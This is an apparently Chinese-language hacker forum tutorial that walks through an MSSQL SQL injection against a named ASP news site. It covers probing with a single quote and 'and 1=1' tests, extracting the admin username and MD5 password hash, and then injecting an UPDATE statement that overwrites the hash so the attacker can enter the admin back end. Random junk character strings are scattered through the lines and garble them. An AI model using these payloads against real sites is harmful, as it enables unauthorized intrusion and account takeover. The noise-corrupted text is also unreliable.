经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
/ _7 K( L; s6 W4 x6 L* C可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)$ _" h, H8 w5 C, c
测试如下:
. W, n% U8 P7 W" { Ohttp://www.tmdsb.com/news.asp?id=121) p; l9 _6 W/ X
在地址后输入单引号,显示9 a2 y) t# ~/ a: j* |
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’1 o- |4 a6 ?$ I: t
字符串 ’’’ 之前有未闭合的引号
# V/ @- h$ [7 ~. N/news/tmdws.asp,行63
2 U- c8 Q$ M; _: O0 y$ K说明没有过滤单引号且数据库是MSSQL.
! H8 M% q+ m- U$ f% mand 1=1正常。and 1=2出错。肯定存在注入- l! x0 {1 d# X! [
接着输入
1 \. Y" C- e6 i! K# h, S4 khttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
! b7 g' U5 Q# m* j( Y$ G得到帐号为:admin
( f2 h" {2 _0 l4 lhttp://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
" W4 k7 j, e# u; P3 q% l- F# |得到密码为:a4716077c2ba075c' n, P9 E. [1 U) J
接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
* L* Y5 \( A" a# t) `8 g K7 q d: }命令如下 :
' f! x; @6 U0 b5 l;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–' A7 H5 z6 ]3 w; H( y5 w0 j
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |